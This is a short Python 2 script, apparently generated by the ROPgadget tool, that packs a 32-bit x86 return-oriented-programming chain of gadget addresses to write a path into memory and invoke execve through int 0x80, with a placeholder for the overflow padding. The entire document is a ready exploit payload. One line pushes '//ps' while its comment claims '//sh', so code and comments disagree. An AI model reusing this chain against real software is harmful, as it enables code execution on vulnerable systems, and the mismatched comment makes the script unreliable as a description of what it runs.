#!/usr/bin/python
# execve generated by Ropgadget v4.0.2
from struct import pack

p = ''
# Padding goes here

p += pack("<I", 0x080e4cd2) # pop ecx ; ret
p += pack("<I", 0x080ef060) # @ .data
p += pack("<I", 0x080c2516) # pop eax ; ret
p += "/bin" # /bin
p += pack("<I", 0x0804b75a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", 0x080e4cd2) # pop ecx ; ret
p += pack("<I", 0x080ef064) # @ .data + 4
p += pack("<I", 0x080c2516) # pop eax ; ret
p += "//ps" # //sh
p += pack("<I", 0x0804b75a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", 0x080e4cd2) # pop ecx ; ret
p += pack("<I", 0x080ef068) # @ .data + 8
p += pack("<I", 0x0804afb0) # xor eax,eax ; ret
p += pack("<I", 0x0804b75a) # mov DWORD PTR [ecx],eax ; ret
p += pack("<I", 0x080481ec) # pop ebx ; ret
p += pack("<I", 0x080ef060) # @ .data
p += pack("<I", 0x080e4cd2) # pop ecx ; ret
p += pack("<I", 0x080ef068) # @ .data + 8
p += pack("<I", 0x0805966a) # pop edx ; ret
p += pack("<I", 0x080ef068) # @ .data + 8
p += pack("<I", 0x0804afb0) # xor eax,eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x0809a8c6) # inc eax ; ret
p += pack("<I", 0x08049429) # int 0x80
print p
